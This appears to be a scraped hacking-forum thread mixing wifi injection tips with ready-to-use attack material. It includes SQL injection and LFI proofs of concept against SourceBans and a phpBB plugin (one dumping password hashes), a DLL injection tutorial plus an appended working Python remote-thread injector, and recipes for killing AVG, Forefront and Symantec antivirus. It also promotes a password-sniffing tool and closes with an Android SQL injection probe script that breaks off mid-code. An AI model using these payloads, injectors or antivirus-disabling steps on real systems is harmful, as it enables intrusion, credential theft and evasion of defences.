  16. OK... nice tutorial... is the script written in bash? or in what?... since you say it's a tutorial for something, post the script you used too, so people have something to play with! BTW... note that you have insert video
  17. @Pugna when I said that, I meant that it is capable if it is also compatible!!! Tell us the card model... or the chipset, so I can tell you which driver supports injection / whether it supports injection at all...
      lspci | grep Wireless -->> if nothing shows up that way, just run "lspci" and pick out the wifi card
      ifconfig wlan0 -->> or whatever your adapter is called (I assume wlan0 or ath0)
      and reply with what it gives you!!
      @gallardo: 1. if you use Linux, do what I wrote above too and reply with the result, so we can see which driver fits and whether it supports injection... 2. what were you trying to do with the command above? what code did you want to put in, and where? if you were trying WPA it's simple... but you need a client already connected!! I don't know which tutorial you were following, but it seems you complicated things badly and needlessly with frame selection... and whatever you do... if you have an AP or wifi card and want to see whether it supports injection:
      aireplay-ng -9 -e "ESSID" -a "BSSID" mon0
      where: -9 is the injection test, "ESSID" the AP's name, "BSSID" the AP's MAC
      LE: What annoys me is that in the normal posting mode (not advanced) there is no "code wrap" button
  18. # Exploit Title: SourceBans <= 1.4.8 SQL/LFI Injection
      # Date: Dec. 6th 2011
      # Author: Havok
      # Software Link: SourceBans
      # Version: <= 1.4.8
      "- What is SourceBans? SourceBans is a free global administration and banning system for Source engine based servers."
      Vulnerabilities:
      1°) SQL Injection:
      Proof of concept: http://1m-4-1337-m8.c0m/index.php?xajax=RefreshServer&xajaxargs[]=1' <=== SQL Error w00t!
      2°) LFI Injection:
      Only works when you're authenticated as root administrator or as somebody who is able to change the SourceBans theme:
      Proof of concept: http://server/index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00
      Note: There is also a possibility to get a shell by adding "GIF89a" at the very beginning of the shell, renaming it to h4x0rz.gif and uploading it as an icon in the admin panel. Then include the file with the LFI and G4M3 0V3R.
      => In memory of crashfr who will NEVER die. Thanks for everything, man! ;-))... R.I.P.
      ./EOF
  19. ====================================================
      MyPage plugin (phpBB) SQL Injection (All versions)
      ====================================================
      Improve your hacking knowledge!
      ====================================================
      # Exploit Title: SQL Injection on the phpBB plugin MyPage
      # Google Dork: inurl:"mypage.php?id="
      # Date: 06/12/2011
      # Author: CrazyMouse (from HackSociety.net)
      # Version: 0.2.3 (this is the last available version, older versions are also vulnerable)
      # Tested on: Windows 7 x64 (Firefox)
      ====================================================
      [~] Exploit: http://localhost/forum/
      [~] http://localhost/forum/mypage.php?id= (SQL)
      [~] Example: http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271
      ====================================================
      # Thanks to Crassus
      ====================================================
      Source
  20. It has been a while since my last article. Special thanks to those who decided to stay with me despite the long break and welcome to new readers! In this article I am going to cover such a trivial (as it may seem) subject as DLL injection. For some reason, most of the tutorials on the web only give us a brief coverage of the topic, mostly limited to invocation of LoadLibraryA/W Windows API function in the address space of another process. While this is not bad at all, it gives us the least flexible solution. Meaning that all the logic MUST be hardcoded in the DLL we want to inject. On the other hand, we may incorporate all the configuration management (loading config files, parsing thereof, etc) into our DLL. This is better, but still fills it with code which is only going to run once. Let us try another approach. What we are going to do, is write a loader (an executable what will inject our DLL into another process) and a small DLL, which will be injected. For simplicity, the loader will also create the target process. Being a Linux user, I used Flat Assembler and mingw32 for this task, but you may adjust the code for whatever environment you prefer. A short remark for nerds before we start. The code in this article does not contain any security checks (e.g. checking correctness of the value returned by specific function) unless it is needed as an example. If you decide to try this code, you'll be doing this at your own risk. So, let the fun begin. Creation of target process Let's assume, that the loader has already passed the phase of loading and parsing configuration files and is ready to start the actual job. Windows provides us with all the tools we need to start a process. There are more then one way of doing that, but let us use the simplest and use CreateProcess API function. 
Its declaration looks quite frightening, but we'll make it as easy as possible: BOOL WINAPI CreateProcess( __in_opt LPCTSTR lpApplicationName, __inout_opt LPTSTR lpCommandLine, __in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes, __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in BOOL bInheritHandles, __in DWORD dwCreationFlags, __in_opt LPVOID lpEnvironment, __in_opt LPCTSTR lpCurrentDirectory, __in LPSTARTUPINFO lpStartupInfo, __out LPPROCESS_INFORMATION lpProcessInformation ); We only have to specify half of the parameters when calling this function and set all the rest to NULL. This function has two variants CreateProcessA and CreateProcessW as ASCII and Unicode versions respectively. We are going to stick with ASCII all way long, so, our code would look like this (due to the fact that "CreateProcess" is rather a macro then function name, we should explicitly specify A version as some compilers tend to default to W versions): CreateProcessA(nameOfTheFile, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInformation); Don't forget to set the cb field of startupInfo to (DWORD)sizeof(STARTUPINFO), otherwise it would not work. If the function succeeds, we get all the information about the process (handles and IDs) in the processInformation structure, which has the following prototype: typedef struct _PROCESS_INFORMATION { HANDLE hProcess; //Handle to the process HANDLE hThread; //Handle to the main thread of the process DWORD dwProcessId; //ID of the new process DWORD dwThreadId; //ID of the main thread of the process }PROCESS_INFORMATION, *LPPROCESS_INFORMATION; By now, the process has been created, but it is suspended. Meaning that it has not started its execution yet and will not until we call ResumeThread(processInformation.dwThreadId) telling the operating system to resume the main thread of the process, but this is going to be the last action performed by our loader. 
Lancet

One may call it shellcode, but it has nothing to do with a viral payload or any other malicious intent (unless someone would say that breaking into the address space of another process is malicious by definition). It is the code that we are going to inject into the target process. It may, theoretically, be written in any language as long as it can be position independent and compiled into native instructions (in our case x86 instructions), but I prefer to do such things in Assembly language.

It is always a good idea to think of what your code is intended to do before writing a single line of it; in this case it is a golden idea. The code needs to be small, preferably fast and stable, as it is a bit of a headache to debug once it has been injected. There are two basic tasks that you would want to assign to this code:

* Load our DLL
* Call the initialization procedure exported by our DLL

and one unavoidable condition: it has to be a function declared as a ThreadProc callback, due to the fact that we are going to use the CreateRemoteThread function in order to launch it. The prototype of a ThreadProc callback function looks like this:

    DWORD WINAPI ThreadProc(__in LPVOID lpParameter);

which means that it has to return a value of type DWORD (which is actually unsigned int). It accepts one parameter, which may either be an actual value (but you have to cast it to the LPVOID type) or a pointer to an array of parameters. One more thing about this function (the last but not the least!): it is a stdcall function; the WINAPI macro is defined as __declspec(stdcall). This means that our function has to take care of cleaning the stack before return. In our case it is quite easy: simply use ret 0x04 (assuming that the size of LPVOID is 4 bytes).

Another important thing to mention: you will, obviously, need to know how many bytes your function occupies in order to correctly allocate memory in the address space of the target process and move your code there.
In addition to the allocation of one block of executable memory for our function, you will also need to allocate one block for data: configuration settings to be passed to the injected DLL. It is easy to pass the address of the parameters as an argument to our ThreadProc. The skeleton of the function would look like this:

    lancet:
        push    ebp
        mov     ebp, esp
        sub     esp, as_much_space_as_you_need_for_variables
        push    registers_you_are_planning_to_use
        ;function body
        pop     registers_you_used
        mov     esp, ebp
        pop     ebp
        ret     0x04
    lancet_size = $-lancet

The last line gives us the exact size of the function in bytes. The following is the source file template:

    format MS COFF                 ;as we are going to link this file with our loader
    public lancet as '_lancet'
    section '.text' readable executable
    lancet:
        ;our function goes here
        ;followed by data
        loadLibraryA db 'LoadLibraryA',0
        init         db 'name_of_the_initialization_function',0
        ourDll       db 'name_of_our_dll',0
        kernel32     db 'kernel32.dll',0
    lancet_size = $-lancet
    public lsize as '_lancet_size'
    section '.data' readable writeable
    lsize dd lancet_size

So, what are we going to insert into the "function body"? First of all, as our code, once it is injected, has no idea of where in memory it is, we should save our "base address" and calculate all the offsets relative to that address. This is done in a simple manner: we call the next address and pop the return address into our local variable.

    call @f
    @@:
    pop  dword [ebp-4]
    sub  dword [ebp-4], @b-lancet

That's it. Now the variable at [ebp-4] contains our "base address". Each time we want to call another function or access our data (the strings with names, remember?) we should do the following:

    mov  ebx, [ebp-4]
    add  ebx, ourDll-lancet
    push ebx
    mov  ebx, [ebp-8]         ;assume that we stored the address of LoadLibraryA at [ebp-8]
    call dword ebx

The code above is the equivalent of LoadLibraryA("name_of_our_dll").

Now about the execution itself. Although we now know where we are, we have no idea what the address of LoadLibraryA is.
There are at least two ways to get that address nicely. The first has been described in my "Stealth Import of Windows API" article. The second is also interesting: the PEB. Yes, we are going to access the Process Environment Block, find the LDR_MODULE structure which refers to KERNEL32.DLL and get its base address (which is also a handle to the library). Some may say that this way is not reliable, not stable and even dangerous, but I will say that statements like these are not serious. We are not going to change anything in those structures. We are only going to parse them.

How do we find the PEB? This is quite simple. It is located at [FS:0x30]. Once we have it, we are on our way to the PEB_LDR_DATA address, which is at PEB+0x0C. In order to parse the PEB_LDR_DATA structure, we should declare the following in our Assembly code:

    struc list_entry
    {
        .flink dd ?        ;pointer to next list_entry structure
        .blink dd ?        ;pointer to previous list_entry structure
    }

    struc peb_ldr_data
    {
        .length      dd ?
        .initialized db ?
                     db ?
                     db ?
                     db ?
        .ssHandle    dd ?
        .inLoadOrderModuleList           list_entry   ;we are going to use this list
        .inMemoryOrderModuleList         list_entry
        .inInitializationOrderModuleList list_entry
    }

    struc ldr_module
    {
        .inLoadOrderModuleList           list_entry   ;pointers to previous and next modules in list
        .inMemoryOrderModuleList         list_entry
        .inInitializationOrderModuleList list_entry
        .baseAddress   dd ?              ;This is what we need!
        .entryPoint    dd ?
        .sizeOfImage   dd ?
        .fullDllName   unicode_string    ;full path to the module file
        .baseDllName   unicode_string    ;name of the module file
        .flags         dd ?
        .loadCount     dw ?
        .tlsIndex      dw ?
        .hashTable     list_entry
        .timeDateStamp dd ?
    }

I leave the implementation of the module list parsing function up to you. You just have to keep in mind that the strings you are going to check are represented by the UNICODE_STRING structure (described in the article referenced above). Another thing to remember is that it is better to implement a case insensitive string comparison function.
Once you find the LDR_MODULE whose baseDllName is "kernel32.dll", you have its handle (simply in the baseAddress field). You may use the _get_proc_address function from the same article (mentioned above) in order to get the address of the LoadLibraryA function. Having that address, you are ready to load your DLL (do the actual injection). Personal suggestion: do not put lots of code into the DllMain function.

LoadLibraryA returns a handle to the newly loaded DLL, which you can use in order to locate your initialization function (remember, it has to be exported by your DLL and preferably use the stdcall convention). After you _get_proc_address of your initialization function, call it and pass the address of the data block as a parameter (it was passed to our lancet function as a parameter on the stack):

    push dword [ebp+8]     ;parameter passed to lancet is here
    call dword [ebp-12]    ;assume that you stored the address of the initialization function here

That's it. Your code may now return. The DLL has been injected and initialized.

Injection

Somehow, we have missed the exciting process of injection of our lancet code. Don't worry, I have not forgotten about it. As I have mentioned above, we have to allocate two blocks: one for code and one for data. This can be done by calling the VirtualAllocEx function, which allows memory allocations in the address space of another process.

    LPVOID WINAPI VirtualAllocEx(
        __in      HANDLE hProcess,
        __in_opt  LPVOID lpAddress,
        __in      SIZE_T dwSize,
        __in      DWORD flAllocationType,
        __in      DWORD flProtect
    );

Use MEM_COMMIT as flAllocationType, and PAGE_EXECUTE_READWRITE and PAGE_READWRITE as flProtect for the allocation of the code and data block respectively. This function returns the address of the allocated block in the address space of the specified process, or NULL. The WriteProcessMemory API function is used to copy your code and data into the address space of the target process.
    BOOL WINAPI WriteProcessMemory(
        __in   HANDLE hProcess,
        __in   LPVOID lpBaseAddress,
        __in   LPCVOID lpBuffer,
        __in   SIZE_T nSize,
        __out  SIZE_T *lpNumberOfBytesWritten
    );

Once you have copied both the data and the code, you will want to call your thread function. The only way to call a function which resides in the memory of another process is by calling the CreateRemoteThread API.

    HANDLE WINAPI CreateRemoteThread(
        __in   HANDLE hProcess,                          //the handle to the target process
        __in   LPSECURITY_ATTRIBUTES lpThreadAttributes, //may be NULL
        __in   SIZE_T dwStackSize,                       //may be 0
        __in   LPTHREAD_START_ROUTINE lpStartAddress,    //the address of our code block
        __in   LPVOID lpParameter,                       //the address of our data block
        __in   DWORD dwCreationFlags,                    //may be 0
        __out  LPDWORD lpThreadId                        //may be NULL
    );

This function returns a handle to the remote thread, which, in turn, may be passed to the WaitForSingleObject API function, so that we can get a notification on its return.

I decided not to cover the possibilities of what your DLL can do while attached to the target process and leave this completely up to you. I hope this article was not too muddled and maybe even helpful. Have fun coding and see you at the next post.

Source
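The loader side of the recipe above, as an added example that is not part of the original post or of the author's own code: the same call sequence (CreateProcessA with CREATE_SUSPENDED, two VirtualAllocEx blocks, WriteProcessMemory, CreateRemoteThread with the data block as lpParameter, WaitForSingleObject, then ResumeThread) done from Python with ctypes. The data block layout in build_data_block and the `ret 4` sanity check are assumptions of this example, not something the article prescribes; the lancet bytes themselves come from your assembled FASM object, and a 32-bit lancet needs a 32-bit Python and a 32-bit target.

```python
# Added example (not from the original post): a Python/ctypes loader following the
# article's CreateProcessA -> VirtualAllocEx -> WriteProcessMemory ->
# CreateRemoteThread -> WaitForSingleObject -> ResumeThread sequence.
import ctypes
import struct

MEM_COMMIT = 0x1000
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
CREATE_SUSPENDED = 0x00000004
INFINITE = 0xFFFFFFFF


class STARTUPINFOA(ctypes.Structure):
    _fields_ = [("cb", ctypes.c_uint32), ("lpReserved", ctypes.c_char_p),
                ("lpDesktop", ctypes.c_char_p), ("lpTitle", ctypes.c_char_p),
                ("dwX", ctypes.c_uint32), ("dwY", ctypes.c_uint32),
                ("dwXSize", ctypes.c_uint32), ("dwYSize", ctypes.c_uint32),
                ("dwXCountChars", ctypes.c_uint32), ("dwYCountChars", ctypes.c_uint32),
                ("dwFillAttribute", ctypes.c_uint32), ("dwFlags", ctypes.c_uint32),
                ("wShowWindow", ctypes.c_uint16), ("cbReserved2", ctypes.c_uint16),
                ("lpReserved2", ctypes.c_void_p), ("hStdInput", ctypes.c_void_p),
                ("hStdOutput", ctypes.c_void_p), ("hStdError", ctypes.c_void_p)]


class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [("hProcess", ctypes.c_void_p), ("hThread", ctypes.c_void_p),
                ("dwProcessId", ctypes.c_uint32), ("dwThreadId", ctypes.c_uint32)]


def ends_with_ret4(code: bytes) -> bool:
    """The lancet is a stdcall ThreadProc with one 4-byte argument, so its last
    instruction must be `ret 4` (C2 04 00). Refuse anything else before injecting."""
    return code.endswith(b"\xC2\x04\x00")


def build_data_block(settings: dict) -> bytes:
    """Assumed layout for the block passed as lpParameter: little-endian u32 entry
    count, then NUL-terminated ASCII "key=value" strings, then a final NUL."""
    body = b"".join(k.encode("ascii") + b"=" + v.encode("ascii") + b"\x00"
                    for k, v in settings.items())
    return struct.pack("<I", len(settings)) + body + b"\x00"


def inject_into_new_process(exe_path: str, lancet: bytes, data: bytes) -> int:
    """Create exe_path suspended, plant lancet + data, run the lancet as a remote
    thread, wait for it, then resume the main thread. Returns the new PID."""
    if not ends_with_ret4(lancet):
        raise ValueError("lancet does not end in 'ret 4'")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    # Without explicit argtypes/restypes ctypes truncates handles and pointers
    # to 32 bits on x64 Python, which silently breaks every call below.
    k32.CreateProcessA.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_void_p,
                                   ctypes.c_void_p, ctypes.c_int, ctypes.c_uint32,
                                   ctypes.c_void_p, ctypes.c_char_p,
                                   ctypes.POINTER(STARTUPINFOA),
                                   ctypes.POINTER(PROCESS_INFORMATION)]
    k32.VirtualAllocEx.restype = ctypes.c_void_p
    k32.VirtualAllocEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t,
                                   ctypes.c_uint32, ctypes.c_uint32]
    k32.WriteProcessMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p,
                                       ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    k32.CreateRemoteThread.restype = ctypes.c_void_p
    k32.CreateRemoteThread.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t,
                                       ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint32,
                                       ctypes.POINTER(ctypes.c_uint32)]
    k32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]
    k32.ResumeThread.argtypes = [ctypes.c_void_p]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]

    si = STARTUPINFOA()
    si.cb = ctypes.sizeof(si)        # the article's "don't forget cb" caveat
    pi = PROCESS_INFORMATION()
    if not k32.CreateProcessA(exe_path.encode("mbcs"), None, None, None, False,
                              CREATE_SUSPENDED, None, None,
                              ctypes.byref(si), ctypes.byref(pi)):
        raise ctypes.WinError(ctypes.get_last_error())

    # One RWX block for the code, one RW block for the data, as in the article.
    code_addr = k32.VirtualAllocEx(pi.hProcess, None, len(lancet), MEM_COMMIT,
                                   PAGE_EXECUTE_READWRITE)
    data_addr = k32.VirtualAllocEx(pi.hProcess, None, len(data), MEM_COMMIT,
                                   PAGE_READWRITE)
    if not code_addr or not data_addr:
        raise ctypes.WinError(ctypes.get_last_error())
    written = ctypes.c_size_t(0)
    for addr, buf in ((code_addr, lancet), (data_addr, data)):
        if not k32.WriteProcessMemory(pi.hProcess, addr, buf, len(buf),
                                      ctypes.byref(written)) or written.value != len(buf):
            raise ctypes.WinError(ctypes.get_last_error())

    # lpStartAddress = code block, lpParameter = data block (lands at [ebp+8]).
    thread = k32.CreateRemoteThread(pi.hProcess, None, 0, code_addr, data_addr, 0, None)
    if not thread:
        raise ctypes.WinError(ctypes.get_last_error())
    k32.WaitForSingleObject(thread, INFINITE)   # returns once the lancet does `ret 4`
    k32.CloseHandle(thread)
    k32.ResumeThread(pi.hThread)                # last action: let the target run
    k32.CloseHandle(pi.hThread)
    k32.CloseHandle(pi.hProcess)
    return pi.dwProcessId
```

Call it as inject_into_new_process(r"C:\target\app.exe", lancet_bytes, build_data_block({"log": "c:/t.txt"})) from a Python whose bitness matches the lancet; the remote thread is awaited before the main thread is resumed, so the DLL's initialization routine has already run when the target executes its first instruction.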
  21. To set wlan0 as an AP:

    iwconfig wlan0 mode Master          -->> OR "Master"
    iwconfig wlan0 channel 6
    iwconfig wlan0 essid Retea          -->> OR "Retea"
    iwconfig wlan0 key 11111111         (64 bit encryption) -->> OR iwconfig wlan0 key open (no password)
    echo 1 > /proc/sys/net/ipv4/ip_forward

(As far as I know) Linux normally routes directly between the network interfaces... so you only need route to show you that it is routing...

    route -FC

ifconfig, I don't see what you could use it for... other than listing the network interfaces and bringing them up/down... so nobody can say you are not using them!!

    ifconfig wlan0 down
    ifconfig wlan0 up
    ifconfig eth0 down
    ifconfig eth0 up

Later edit: or you can also make a bridge like this:

    brctl addbr br0
    ifconfig wlan0 0.0.0.0
    brctl addif br0 wlan0
    ifconfig br0 192.168.1.115 netmask 255.255.255.0 up
    route add -net 192.168.1.0 netmask 255.255.255.0 br0
    route add default gw 192.168.1.1 br0

Or set up dnsmasq as the DHCP server on the new LAN:

    WAN=eth0
    LAN=wlan0
    LANIP="192.168.133.1"
    DHCPRANGE="192.168.133.2,192.168.133.253"

    # setup forwarding and the dnsmasq service
    fwd() {
        iptables -A FORWARD -i $LAN -j ACCEPT
        iptables -A FORWARD -o $LAN -j ACCEPT
        iptables -t nat -A POSTROUTING -o $WAN -j MASQUERADE
        echo 1 > /proc/sys/net/ipv4/ip_forward
        ifconfig $LAN $LANIP/24 up
        # no trailing backslash after the last option, otherwise the echo below
        # becomes extra arguments to dnsmasq
        /usr/sbin/dnsmasq -C /dev/null >/dev/null 2>&1 \
            --bind-interfaces \
            --listen-address=$LANIP \
            --dhcp-range=$DHCPRANGE,12h
        echo "to disable: $0 -d WAN=$WAN LAN=$LAN"
    }

    # remove forwarding and the dnsmasq service
    unfwd() {
        pkill -9 dnsmasq
        ifconfig $LAN down
        echo 0 > /proc/sys/net/ipv4/ip_forward
        iptables -D FORWARD -i $LAN -j ACCEPT
        iptables -D FORWARD -o $LAN -j ACCEPT
        iptables -t nat -D POSTROUTING -o $WAN -j MASQUERADE
    }

Off-topic: @Pugna ... Stop with the pointless posts... you already have 95 posts (none of which is with or about anything interesting) and you only registered this month... WTF?? Drop the post hunting, it is not accepted!! And btw... you will never be well enough documented if you are a Troll!!
  22. When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have become quite adept with signatures that match assembly stub routines that are used to inject malware into a system. The A/V guys will also pick up on common service executable files such as the one used with Metasploit's bypassuac. Let's face it, we still need to write stuff into temp directories from time to time.

Mark Baggett and Tim Tomes recently presented some nice techniques on hiding malware within Windows volume shadow copies (Tim Tomes and Mark Baggett, "Lurking in the Shadows", Hack3rcon II (Hacking Illustrated Series InfoSec Tutorial Videos)). Since it is unlikely for A/V products to be able to scan volume shadow copies, and the capability to create a process from a volume shadow copy using 'wmic' exists, we would likely want to follow this sequence of tasks during a test:

a) Disable the A/V product of choice.
b) Upload our favorite/useful executable content (perhaps a reverse TCP meterpreter shell or similar).
c) Upload Mark and Tim's excellent vssown.vbs script.
   a. Enable the service and create a volume shadow copy.
   b. Disable the volume shadow copy service.
d) Delete our favorite/useful executable content and modify timestamps accordingly, assuming we want to be somewhat stealthy.
e) Execute our content from the volume shadow copy using 'wmic', either through the excellent vssown script or just through 'wmic process call create'.

The challenge presented is whether we can effectively disable the antivirus product of choice. Listed below are some possible techniques for three popular products which may get us what we need. None of these techniques are stealthy from a user interface perspective. Otherwise said, Windows Security Center and the A/V tray executable files themselves will try to inform the user that something is broken when we proceed with these recipes.

1. Grisoft's AVG

Using the 2012 Freeware version, I note the following information about AVG. Services running are the AVG watchdog (avgwd) and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.

DISABLING:

a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.

    C:\> cd %systemroot%\program files\avg\avg2012
    C:\> move avgcsrva.exe avgcsrva_.exe
    C:\> move avgemca.exe avgemca_.exe
    C:\> move avgnsa.exe avgnsa_.exe
    C:\> move avgrsa.exe avgrsa_.exe

b. Kill the running processes simultaneously with a one line (wildcard powered) wmic command.

    C:\> wmic process where "name like 'avg[cenr]%.exe'" delete

c. The watchdog service will try to restart all of the binaries but fail.

ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest.

2. Microsoft Forefront

The service name is "msmpsvc", and the running processes are msmpeng.exe and msseces.exe, one being the engine and the other the GUI reporting/configuration tool respectively.

DISABLING: kill the GUI tool and stop the A/V engine service.

    C:\> wmic process where name="msseces.exe" delete
    C:\> sc stop msmpsvc

ENABLING: start the A/V engine service, and start the GUI process.

    C:\> cd \Program Files\Microsoft Security Client
    C:\> sc start msmpsvc
    C:\> msseces.exe

3. Symantec Endpoint Protection

The services running are ccEvtMgr, ccSetMgr, smcservice and "Symantec AntiVirus". The processes that matter are smc.exe and smcgui.exe.

DISABLING: kill the processes and stop the services. I found that the event manager (ccEvtMgr) and settings manager (ccSetMgr) services can remain running without any impact.

    C:\> wmic process where "name like '%smc%.exe'" delete
    C:\> sc stop smcservice
    C:\> sc stop "Symantec AntiVirus"

ENABLING: restarting just the smcservice will start everything else back up again.

    C:\> sc start smcservice

To prevent the Security Center from complaining about your crashed AV, just register a second one via wmic:

    wmic /namespace:\\root\securitycenter PATH AntiVirusProduct CREATE displayName=DummyAV,onAccessScanningEnabled=TRUE,productUptoDate=TRUE

Once you are finished testing, you can delete it again:

    wmic /namespace:\\root\securitycenter PATH AntiVirusProduct WHERE displayname='DummyAV' DELETE

Source
  23. Many security researchers use the Metasploit Framework for security proofs of concept and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit's Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone's file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple's code signing requirements, which allowed him to run arbitrary code on the iPhone.

Source
  24. Intercepter-NG is a new and improved sniffing tool with many added features. It supports several sniffing modes. For instance, in raw mode it acts like a pure sniffer, with an appearance similar to Wireshark, providing enough functionality to perform quick research of the network traffic. In eXtreme mode Intercepter-NG will analyze all TCP packets without checking ports, so even if an application uses an undefined port, the sniffer will check those packets anyway. It also provides a remote traffic capturing mode, which allows you to transfer network data from one host to another via the libpcap RPCAP protocol. Intercepter-NG can also act as a Stealth DHCPD, allowing you to use it as a simple DHCP server for DHCP MiTM attacks. In NAT mode, it translates ICMP/UDP/TCP packets from Ethernet to Ethernet, and from Ethernet to PPPoE areas. Long outgoing packets (up to MTU size) are fragmented and MSS tracking is performed.

Features of Intercepter-NG:

* Sniffing passwords/hashes of the types: ICQ, IRC, AIM, FTP, IMAP, POP3, SMTP, LDAP, BNC, SOCKS, HTTP, WWW, NNTP, CVS, TELNET, MRA, DC++, VNC, MYSQL, ORACLE
* Sniffing chat messages of ICQ, AIM, JABBER, YAHOO, MSN, IRC, MRA
* Promiscuous-mode ARP, DHCP, Gateway, Smart Scanning
* Raw mode (with pcap filter)
* eXtreme mode
* Capturing packets and post-capture (offline) analyzing
* Remote traffic capturing via RPCAP daemon
* NAT
* ARP MiTM
* DNS over ICMP MiTM
* DHCP MiTM
* SSL MiTM + SSL Strip

Operating systems supported: Microsoft Windows 2K, XP, 2k3, Vista, 7

Video tutorial on Intercepter-NG

Download Intercepter-NG: Intercepter-NG.v09.zip

Sorry... I don't really use the search function..
  25. Today we are releasing WebContentResolver, an Android assessment tool which allows you to find Content-Provider vulnerabilities in no time. A Content-Provider is one of Android's IPC endpoints; it is commonly used to implement data storage in applications and to offer access to this data to other applications on the device. The Android browser bookmarks or the Android contacts list are just two examples of Content-Providers implemented on every Android. Unfortunately these Content-Providers are often riddled with vulnerabilities which allow third party applications or compromised applications to gain access to sensitive data. Regularly we find vulnerabilities, such as directory traversal or SQL injection, in providers installed as part of the Android system or by third party applications. As these issues are similar to issues that are commonly found in web applications, it would be desirable to test Content-Providers in the same way web applications are tested. This will allow us to leverage the current skill set of web application testers and the currently available tool set for web application testing. This is exactly what WebContentResolver does.

This blog post will walk you through an example of how to use WebContentResolver. For this example we use the new Google Galaxy Nexus phone with Android 4.0. We start by installing the WebContentResolver.apk to the phone or emulator which we would like to test. This will create an icon in the Launcher menu, which we start now. This will start a local web server listening on port 8080. We can forward this port to a desktop computer using the following command (for this, USB debugging needs to be enabled):

    ./adb forward tcp:8080 tcp:8080

Once this is done we can access the web server from our desktop using the following URL:

    http://localhost:8080/

This will give us a very brief overview of the implemented methods. First of all we are interested in what content providers are available.
We achieve this by browsing to http://localhost:8080/list . The overview we get includes the providers, names and permissions in the following format:

    package: com.android.providers.drm
    authority: drm
    exported: true
    readPerm: null
    writePerm: null
    ---------------------------------------------
    package: com.android.providers.media
    authority: media
    exported: true
    readPerm: null
    writePerm: null
    ---------------------------------------------
    package: com.android.providers.settings
    authority: settings
    exported: true
    readPerm: null
    writePerm: android.permission.WRITE_SETTINGS
    ---------------------------------------------
    package: com.android.providers.telephony
    authority: telephony
    exported: true
    readPerm: null
    writePerm: null

We can now move on to query one of the providers. In our example we choose the settings provider. Pointing the browser at http://localhost:8080/query?a=settings&path0=system will give us the content of the settings table in the Settings provider. Going to http://localhost:8080/query will give us a brief overview of the functionality of the query method. Going to http://localhost:8080/query?a=settings&path0=system&selName=_id&selId=5 will show us a single row in the table:

    Query successful:
    Column count: 3
    Row count: 1
    | _id | name         | value |
    | 5   | volume_alarm | 6     |

And http://localhost:8080/query?a=settings&path0=system&selName=_id&selId=5' (note the trailing single quote, which is what reaches the SQL below) will demonstrate the first vulnerability:

    Exception: android.database.sqlite.SQLiteException: unrecognized token: "')": , while compiling: SELECT * FROM system WHERE (_id=5')

You can now choose to use your favourite web app testing tool, such as sqlmap, to assess the provider further and to exploit the vulnerability.

Disclaimer: The use of tools like WebContentResolver will never replace proper audits and reviews of applications.

Source
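The triage the post walks through by hand, as an added example that is not part of the original post and not code from the WebContentResolver project: parse the /list output format shown above, pick out providers that are exported with no read (or read and write) permission, build the /query URL with the selection value left verbatim so the trailing quote reaches the provider, and classify the response as injectable when it echoes a SQLite parser error. The host and port and the /list and /query URL forms are taken from the post; the error-marker list and the helper names are assumptions of this example, and the sample listing is constructed, not live output.

```python
# Added example (not from the original post or the WebContentResolver tool):
# client-side triage of the forwarded web interface described above.
import re
import urllib.parse
import urllib.request

BASE = "http://localhost:8080"                       # from the post (adb forward)
SQL_ERROR_MARKERS = ("SQLiteException", "unrecognized token", "syntax error")  # assumption

# Constructed sample in the /list format shown in the post (not live output).
SAMPLE_LIST = """package: com.android.providers.drm
authority: drm
exported: true
readPerm: null
writePerm: null
---------------------------------------------
package: com.android.providers.settings
authority: settings
exported: true
readPerm: null
writePerm: android.permission.WRITE_SETTINGS
---------------------------------------------
package: com.android.providers.telephony
authority: telephony
exported: false
readPerm: null
writePerm: null
"""


def parse_provider_list(text: str) -> list:
    """Turn the dash-separated /list records into a list of dicts."""
    records = []
    for chunk in re.split(r"^-{3,}\s*$", text, flags=re.M):
        rec = {}
        for line in chunk.strip().splitlines():
            key, _, value = line.partition(":")
            rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def unprotected(records: list, want_write: bool = False) -> list:
    """Authorities any app can read (or read and write) without holding a
    permission: exported, and the relevant permission field is 'null'."""
    out = []
    for r in records:
        if r.get("exported") != "true" or r.get("readPerm") != "null":
            continue
        if want_write and r.get("writePerm") != "null":
            continue
        out.append(r["authority"])
    return out


def probe_url(authority: str, path0: str, column: str, value: str) -> str:
    """Build the /query URL from the post; the selection value is passed as
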